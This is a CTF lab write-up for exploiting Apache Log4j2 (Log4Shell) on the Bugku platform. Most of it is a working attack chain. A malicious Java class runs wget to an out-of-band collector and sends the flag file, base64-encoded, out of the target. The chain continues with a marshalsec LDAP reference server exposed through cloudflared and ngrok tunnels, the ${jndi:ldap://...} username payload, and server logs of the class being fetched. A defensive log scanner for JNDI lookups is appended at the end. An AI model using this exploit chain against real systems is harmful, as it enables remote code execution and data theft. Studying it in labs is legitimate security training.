Bugku Lab: Apache Log4j2 RCE
Challenge link: https://ctf.bugku.com/challenges/detail/id/340.html

Build the malicious class Exploit.java:
```java
public class Exploit {
    public Exploit() {
    }

    // The static initializer runs as soon as the class is loaded.
    static {
        try {
            // Earlier variant: list the working directory.
            // String[] cmds = {"/bin/sh", "-c", "wget -qO- http://vjigzgm3930ko9hia69i0q21us0joec3.oastify.com/?result=$(ls | base64)"};
            // Read the flag file and send it, base64-encoded, to the out-of-band collector URL.
            String[] cmds = {"/bin/sh", "-c", "wget -qO- http://vjigzgm3930ko9hia69i0q21us0joec3.oastify.com/?result=$(cat flag | base64)"};
            java.lang.Runtime.getRuntime().exec(cmds).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        Exploit e = new Exploit();
    }
}
```
```
javac Exploit.java
```

This generates Exploit.class.

It must be compiled with JDK 8, otherwise the server may fail to load it. My machine has several Java versions installed, so I use:

```
/usr/libexec/java_home -v 1.8 --exec javac Exploit.java
```

Run in the current directory:

```
python -m http.server 8888
```

Expose it through a tunnel:

```
cloudflared tunnel --url http://localhost:8888
+--------------------------------------------------------------------------------------------+
|  Your quick Tunnel has been created! Visit it at (it may take some time to be reachable):  |
|  https://pope-supplemental-notices-greetings.trycloudflare.com                             |
+--------------------------------------------------------------------------------------------+
```

This step hosts Exploit.class publicly; the LDAP server references this URL to load the malicious class.

```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "https://pope-supplemental-notices-greetings.trycloudflare.com/#Exploit"
Listening on 0.0.0.0:1389
```

Expose it through a tunnel:

```
ngrok tcp 1389
Forwarding tcp://0.tcp.ap.ngrok.io:10489 -> localhost:1389
```

Log in with the username ${jndi:ldap://0.tcp.ap.ngrok.io:10489/Exploit} to trigger the RCE.
```
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "https://pope-supplemental-notices-greetings.trycloudflare.com/#Exploit"
Listening on 0.0.0.0:1389
Send LDAP reference result for Exploit redirecting to https://pope-supplemental-notices-greetings.trycloudflare.com/Exploit.class
```

```
$ python -m http.server 8888
Serving HTTP on :: port 8888 (http://[::]:8888/) ...
::1 - - [22/Nov/2025 22:57:23] "GET /Exploit.class HTTP/1.1" 200 -
```
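
A defender-side check for the login step above, as an added example that is not part of the original write-up: it scans log lines that record the raw submitted username for the literal `${jndi:...}` lookup and extracts the callback host and port, which can then be used for egress blocking or hunting. The log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Literal lookup form used in the login step: ${jndi:<scheme>://host:port/name}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)

# JNDI schemes that make the JVM contact a remote server.
REMOTE_SCHEMES = {"ldap", "ldaps", "rmi", "dns", "iiop"}


def find_jndi_lookups(text):
    """Return (scheme, host, port, name) for each literal JNDI lookup in text."""
    hits = []
    for match in JNDI_LOOKUP.finditer(text):
        raw = match.group(1)
        try:
            url = urlsplit(raw)
            port = url.port  # raises ValueError on a malformed port
        except ValueError:
            # Still report it: an unparsable lookup in a username is suspicious.
            hits.append(("malformed", raw, None, ""))
            continue
        if url.scheme in REMOTE_SCHEMES and url.hostname:
            hits.append((url.scheme, url.hostname, port, url.path.lstrip("/")))
    return hits


def scan_log(lines):
    """Return (line_number, scheme, host, port, name) for every hit in lines."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            findings.append((lineno, *hit))
    return findings


# Constructed request-log lines that record the raw submitted username.
SAMPLE_LOG = [
    "2025-11-22 22:55:01 POST /login user=alice status=401",
    "2025-11-22 22:57:20 POST /login user=${jndi:ldap://0.tcp.ap.ngrok.io:10489/Exploit} status=401",
    "2025-11-22 22:58:02 POST /login user=${env:HOME} status=401",
]

if __name__ == "__main__":
    for lineno, scheme, host, port, name in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {scheme} callback to {host}:{port} (name={name!r})")
```

Correlating a hit with an outbound connection from the application host to the extracted host and port, followed by an HTTP fetch of a `.class` file, matches the sequence shown in the terminal output above.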
